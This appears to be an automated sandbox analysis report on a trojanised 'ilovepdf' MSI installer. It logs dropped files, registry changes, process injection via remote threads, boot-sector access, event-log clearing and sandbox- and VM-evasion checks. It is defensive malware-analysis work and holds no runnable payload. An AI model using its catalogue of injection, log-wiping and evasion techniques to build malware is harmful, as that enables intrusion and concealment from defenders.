Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0062C764 GetVersion,CoCreateInstance,
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0041A4DC GetDiskFreeSpaceW,
Source: svchost.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC5C60 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
Source: 6rfyiAq0nM.msiStatic file information: TRID: Microsoft Windows Installer (77509/1) 90.59%
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpWindow found: window name: TMainForm
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Next
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: 6rfyiAq0nM.msiStatic file information: File size 7306752 > 1048576
Source: Binary string: 2"j.pdb source: is-30MA7.tmp.11.dr
Source: Binary string: .pdbYH source: is-UKPSI.tmp.11.dr
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004B5000 push 004B50DEh; ret
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004B5980 push 004B5A48h; ret
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458000 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0049B03C push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A00F8 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458084 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004B1084 push 004B10ECh; ret
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A1094 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0041A0B4 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004270BC push 00427104h; ret
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458108 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004321C8 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A21D8 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0049E1B8 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0049A260 push 0049A378h; ret
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00455268 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004252D4 push ecx; mov dword ptr [esp], eax
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004592FC push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0045B284 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00430358 push ecx; mov dword ptr [esp], eax
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00430370 push ecx; mov dword ptr [esp], eax
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00459394 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A1428 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0049B424 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A24D8 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004224F0 push 004225F4h; ret
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004304F0 push ecx; mov dword ptr [esp], eax
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00499490 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458564 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458574 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00457574 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC8FD0 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,
Source: MSIFBC3.tmp.2.drStatic PE information: section name: .didata
Source: MSIFBC3.tmp.10.drStatic PE information: section name: .didata
Source: is-JDQA9.tmp.11.drStatic PE information: section name: .didata
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIFBC3.tmp
Contains functionality to infect the boot sectorShow sources
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0
Source: C:\Windows\System32\svchost.exeCode function: GetModuleHandleA,GetProcAddress,GetSystemFirmwareTable,GetSystemFirmwareTable,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-30MA7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_isdecmp.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFBC3.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\ti.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-93C0J.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\sqlite.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\twlib.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-UKPSI.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-JDQA9.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-VR0CA.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\th.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\tt.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-CU1EC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\unins000.exe (copy)Jump to dropped file
Source: C:\Windows\Installer\MSIFBC3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFBC3.tmpJump to dropped file

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0
Source: C:\Windows\System32\svchost.exeCode function: GetModuleHandleA,GetProcAddress,GetSystemFirmwareTable,GetSystemFirmwareTable,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ilovepdf.lnkJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC3710 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_006A52B8 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_005C7E30 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EBA010 ClearEventLogW,OpenEventLogA,ClearEventLogW,CloseEventLog,
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5HQ15BTC-BI2Q-S1J7-YRC6-SZJY3C3CP8J7}\650478DC7424C37C 1Jump to behavior
Source: C:\Windows\System32\svchost.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Control Panel\International
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Installer\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\Installer\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Query firmware table information (likely to detect VMs)Show sources
Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
Contains functionality to compare user and computer (likely to detect sandboxes)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,StrStrIW,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,FindCloseChangeNotification,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB3C30
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D4410
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17874410
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3384410
Source: C:\Windows\System32\svchost.exe TID: 6684Thread sleep count: 717 > 30
Source: C:\Windows\System32\svchost.exe TID: 6684Thread sleep time: -71700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6668Thread sleep count: 1082 > 30
Source: C:\Windows\System32\svchost.exe TID: 6668Thread sleep time: -14400000s >= -30000s
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC5C60 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LocalFree,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,CloseServiceHandle,Sleep,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exeCode function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 3600000
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 717
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1082
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3384410
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB3C30
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-30MA7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_isdecmp.dllJump to dropped file
